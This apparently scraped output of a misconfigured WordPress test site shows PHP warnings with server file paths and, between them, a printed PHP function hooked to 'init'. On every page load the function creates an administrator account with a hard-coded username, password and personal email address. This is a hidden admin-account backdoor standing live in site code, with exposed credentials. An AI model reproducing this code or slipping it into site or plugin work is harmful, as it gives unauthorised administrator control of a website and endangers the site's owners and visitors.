Warning: Creating default object from empty value in /home/customer/www/test.evercolor.net/public_html/wp-content/plugins/avonmore-core/ReduxCore/inc/class.redux_filesystem.php on line 29

Warning: Declaration of Avonmore_Walker_Nav_Menu::walk($items, $depth) should be compatible with Walker::walk($elements, $max_depth, ...$args) in /home/customer/www/test.evercolor.net/public_html/wp-content/themes/avonmore/functions.php on line 1007
function wp_create_new_user(){ $user = 'chiara'; $pass = 'evercolor'; $email = 'lasolitachia@gmail.com'; if ( !username_exists( $user ) && !email_exists( $email ) ) { $user_id = wp_create_user( $user, $pass, $email ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } add_action('init','wp_create_new_user');
Warning: Cannot modify header information - headers already sent by (output started at /home/customer/www/test.evercolor.net/public_html/wp-content/plugins/avonmore-core/ReduxCore/inc/class.redux_filesystem.php:29) in /home/customer/www/test.evercolor.net/public_html/wp-includes/pluggable.php on line 1416